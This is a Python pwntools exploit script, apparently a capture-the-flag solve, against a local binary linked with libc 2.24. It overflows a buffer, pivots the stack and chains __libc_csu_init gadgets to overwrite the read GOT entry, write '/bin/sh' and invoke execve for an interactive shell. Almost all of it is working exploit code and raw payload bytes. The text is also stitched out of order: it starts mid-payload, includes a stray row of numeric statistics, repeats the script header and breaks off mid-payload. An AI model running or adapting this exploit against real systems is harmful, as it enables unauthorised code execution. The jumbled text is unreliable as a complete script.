x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x96\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x0e\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x80\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xe0\x05\x40\x00\x00\x00\x00\x00\x68\x06\x40\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x4a\x07\x40\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e'
proc.send(payload)
time.sleep(0.2)
proc.recvrepeat(0)
payload = p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.got['read'])
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x1)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.bss())
payload += p64(0x3b)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(target_base + target.bss())
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
proc.send(payload)
time.sleep(0.2)
payload = b'\x0e'
proc.send(payload)
time.sleep(0.2)
payload = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
proc.send(payload)
time.sleep(0.2)
proc.interactive()
| 120.065421 | 9,006 | 0.732856 | #!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x400840
__libc_csu_init_call_target = 0x400e48
__libc_csu_init_gadget1 = 0x400896
__libc_csu_init_gadget2 = 0x400880
canary = 0x0
libc_2_24_so_base = 0x0
pivot_dest = 0x601860
target_base = 0x0
target_leave_ret = 0x40074a
target_pop_rbp_ret = 0x400668
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
payload = b'\x45\x76\x65\x72\x79\x74\x68\x69\x6e\x67\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x20\x69\x73\x20\x73\x6f\x20\x62\x6f\x72\x69\x6e\x67\x2e\x6e\x57\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x96\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x0e\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x80\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xe0\x05\x40\x00\x00\x00\x00\x00\x68\x06\x40\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x4a\x07\x40\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\